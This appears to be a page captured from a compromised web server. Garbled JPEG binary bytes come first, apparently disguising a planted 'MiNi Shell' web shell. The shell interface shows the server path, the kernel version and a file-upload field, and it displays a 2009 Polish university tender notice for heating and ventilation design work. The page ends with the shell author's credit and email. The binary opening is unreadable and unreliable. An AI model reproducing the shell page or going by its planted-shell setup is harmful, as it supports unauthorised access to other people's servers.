JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090417/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090417/63785-N-2009.html

<p class="kh_header"><b>Gdańsk: Opracowanie projektu budowlano-wykonawczego modernizacji instalacji c.o. i instalacji wentylacji wraz z inwentaryzacją budowlaną budynków Wydziału Farmacji w Gdańsku przy ul. Hallera 107 i Międzywydziałowego Instytutu Medycyny Morskiej i Tropikalnej w Gdyni ul. Powst. Styczniowego 9b.</b><br>
<b>Numer ogłoszenia: 63785 - 2009; data zamieszczenia: 17.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Medyczna , ul. M. Skłodowskiej-Curie 3a, 80-210 Gdańsk, woj. pomorskie, tel. (058) 349-12-44, faks (058) 301-61-15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.amg.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu budowlano-wykonawczego modernizacji instalacji c.o. i instalacji wentylacji wraz z inwentaryzacją budowlaną budynków Wydziału Farmacji w Gdańsku przy ul. Hallera 107 i Międzywydziałowego Instytutu Medycyny Morskiej i Tropikalnej w Gdyni ul. Powst. Styczniowego 9b..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia jest  opracowanie projektu budowlano-wykonawczego modernizacji instalacji c.o. i instalacji wentylacji wraz z inwentaryzacją budowlaną budynków Wydziału Farmacji w Gdańsku przy ul. Hallera 107 i Międzywydziałowego Instytutu Medycyny Morskiej i Tropikalnej w Gdyni ul. Powst. Styczniowego 9b . 

Zamówienie zostało podzielone na trzy części zwane dalej zadaniami.
Zadanie nr 1 (Część 1) - MIMMiT obejmuje opracowanie  :
Projektu budowlano-wykonawczego modernizacji  instalacji centralnego ogrzewania dla wszystkich budynków,
Projektu budowlano-wykonawczego modernizacji wentylacji mechanicznej wraz instalacjami towarzyszącymi dla budynku głównego,
Inwentaryzacji budowlanej wszystkich budynków.
Zadanie nr 2 (Część 2 ) - Wydział Farmacji budynek główny i audytoryjny obejmuje opracowanie :
Projektu budowlano-wykonawczego modernizacji  instalacji centralnego ogrzewania ,
Projektu budowlano-wykonawczego modernizacji wentylacji mechanicznej wraz instalacjami towarzyszącymi , Inwentaryzacji budowlanej.
Zadanie nr 3 (Część 3 ) - Wydział Farmacji budynek laboratoryjny obejmuje opracowanie:
Projektu budowlano-wykonawczy modernizacji  instalacji centralnego ogrzewania ,
Projektu budowlano-wykonawczy modernizacji wentylacji mechanicznej wraz instalacjami towarzyszącymi , Inwentaryzacji budowlanek.

2. Pełnienie nadzory autorskiego w trakcie wykonywania robót na podstawie opracowanej dokumentacji projektowo-kosztorysowej.

3.Szczegółowy zakres prac projektowych oraz wykaz budynków do inwentaryzacji budowlanej został określony w załączniku nr 4 i 5 do SIWZ.
 
4. Wytyczne do modernizacji instalacji centralnego ogrzewania oraz wentylacji zawarte są w audytach energetycznych, których fragmenty zawierające opis przyjętych rozwiązań modernizacyjnych stanowią załącznik nr  6 do SIWZ.

5. Zaleca się przeprowadzenie wizji w terenie, w celu ustalenia pełnego zakresu prac związanych z realizacją zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia tj.:
a. wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, 1 zamówienie polegające  na wykonaniu projektu instalacji centralnego ogrzewania  budynków o kubaturze  minimum 10000 m3,

b. wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie 2 zamówienia polegające na wykonaniu :
- jednego projektu instalacji wentylacji w budynkach o kubaturze minimum 10000 m3  w których występowały instalacje: wentylacji ogólnej nawiewno-wywiewnej, odciągów miejscowych i instalacje odzysku ciepła w tym co najmniej jedna z udziałem czynnika pośredniego,
- jednego projektu wentylacji (klimatyzacji) laboratorium dla potrzeb niżej wymienionych grup (ochrona zdrowia, szkolnictwo wyższe, przemysł) w którym występują minimum dwie z niżej wymienionych technik wentylacyjnych:
-regulowanie automatycznie i monitorowanie układów ciśnień między pomieszczeniami,
-stosowanie wyporowej techniki napływu powietrza,
-stosowanie III stopnia filtracji wraz  monitoringiem,
-utrzymywanie i monitorowanie zadanych temperatur i wilgotności
-stosowanie okapów wyciągowych.
3) dysponują lub będą dysponować potencjałem technicznym do wykonania zamówienia,
4)dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia, t.j.:
a. co najmniej 1 osobą posiadającą  uprawnienia do projektowania bez ograniczeń z minimum 5 letnim   doświadczeniem w projektowaniu w specjalności architektonicznej, 	
b.co najmniej 1 osobą posiadającą  uprawnienia do projektowania bez ograniczeń z minimum 5 letnim  doświadczeniem w projektowaniu w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,  wodociągowych i kanalizacyjnych .

lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
Zamawiający wymaga, aby osoby, od których wymagane są uprawnienia legitymowały się aktualnym zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego. 
5)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
6)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 pzp) 
2. Ocena spełnienia w.w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdz. IV SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w.w warunki Wykonawca spełnił.
3. Nie spełnienie chociażby jednego z w.w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania o udzielenie zamówienia, z zastrzeżeniem art.26 ust. 3 pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełniania warunków udziału w postępowaniu wraz z ofertą należy złożyć następujące oświadczenia i dokumenty:
1)oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 pzp [zawarte jest w formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ];
2)aktualny odpis z właściwego rejestru, albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3)wykaz wykonanych przez Wykonawcę w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zamówień wyszczególnionych  w rozdz. III ust. 1 pkt 2 a) i b) SIWZ  z   podaniem  ich wartości , przedmiotu,  dat wykonania i odbiorców oraz  załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie [wg załącznika nr 2 do SIWZ];
4)wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o których mowa powyżej wykonawca wskazał osoby, którymi będzie dysponował [wg załącznika nr 3]. Z wykazu musi jednoznacznie wynikać, iż wykonawca dysponuje lub będzie dysponował osobami wymaganymi w rozdz. III ust. 1 pkt 4 a) i b) SIWZ.

5)dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają   wymagane uprawnienia, t.j.: uprawnienia do projektowania wraz z aktualnymi zaświadczeniami z właściwej Izby Samorządu Zawodowego, potwierdzającymi przynależność do Izby. 
6)aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładów Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzające,   że Wykonawca nie zalega z opłaceniem podatków, opłat lub składek na  ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości  wykonania decyzji właściwego organu.
W.w dokumenty uważa się za aktualne, jeżeli zostały wystawione  nie wcześniej niż 3  miesiące przed  upływem terminu składania ofert.

2.W przypadku Wykonawców wspólnie ubiegających się o zamówienie, każdy z nich składa oddzielnie dokument wymieniony w rozdz. IV pkt 1 ppkt 2) i 6)  SIWZ natomiast dokumenty opisane w rozdz. IV  pkt 1 ppkt 1), 3), 4), 5) SIWZ mogą złożyć wspólne.
3. Dokumenty mogą być przedstawione w formie oryginałów albo kopii poświadczonych za zgodność z oryginałem przez upoważnion(ego)ych przedstawiciel(a)i Wykonawcy.
4.Poświadczenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem).
5.W przypadku poświadczenia za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo musi być przedstawione w formie oryginału lub poświadczonej notarialnie za zgodność z oryginałem kopii.
6.Brak jakiegokolwiek z wymaganych oświadczeń lub dokumentów, lub złożenie dokumentu w niewłaściwej formie (np. niepoświadczone za zgodność z oryginałem kopie) spowoduje wykluczenie Wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 pzp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.przetargi.amg.gda.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Inwestycyjno-Remontowy Akademii Medycznej w Gdańsku, pawilon nr 4, pok. nr 22, ul. M.Skłodowskiej-Curie 3 a,  80-210 Gdańsk.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 09:00, miejsce: Dział Inwestycyjno-Remontowy Akademii Medycznej w Gdańsku, pawilon nr 4, pok. nr 22, ul. M.Skłodowskiej-Curie 3 a,  80-210 Gdańsk.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie  :
Projektu budowlano-wykonawczego modernizacji  instalacji centralnego ogrzewania dla wszystkich budynków,
Projektu budowlano-wykonawczego modernizacji wentylacji mechanicznej wraz instalacjami towarzyszącymi dla budynku głównego,
Inwentaryzacji budowlanej wszystkich budynków
MIMMiT w Gdyni.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 (Część 1) - MIMMiT obejmuje opracowanie  :
Projektu budowlano-wykonawczego modernizacji  instalacji centralnego ogrzewania dla wszystkich budynków,
Projektu budowlano-wykonawczego modernizacji wentylacji mechanicznej wraz instalacjami towarzyszącymi dla budynku głównego,
Inwentaryzacji budowlanej wszystkich budynków..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie :
Projektu budowlano-wykonawczego modernizacji  instalacji centralnego ogrzewania ,
Projektu budowlano-wykonawczego modernizacji wentylacji mechanicznej wraz instalacjami towarzyszącymi , Inwentaryzacji budowlanej
Wydziału Farmacji budynek główny i audytoryjny ..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 (Część 2 ) - Wydział Farmacji budynek główny i audytoryjny obejmuje opracowanie :
Projektu budowlano-wykonawczego modernizacji  instalacji centralnego ogrzewania ,
Projektu budowlano-wykonawczego modernizacji wentylacji mechanicznej wraz instalacjami towarzyszącymi , Inwentaryzacji budowlanej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie:
Projektu budowlano-wykonawczy modernizacji  instalacji centralnego ogrzewania ,
Projektu budowlano-wykonawczy modernizacji wentylacji mechanicznej wraz instalacjami towarzyszącymi , Inwentaryzacji budowlanej
Wydziału Farmacji budynek laboratoryjny..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 (Część 3 ) - Wydział Farmacji budynek laboratoryjny obejmuje opracowanie:
Projektu budowlano-wykonawczy modernizacji  instalacji centralnego ogrzewania ,
Projektu budowlano-wykonawczy modernizacji wentylacji mechanicznej wraz instalacjami towarzyszącymi , 
Inwentaryzacji budowlanej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com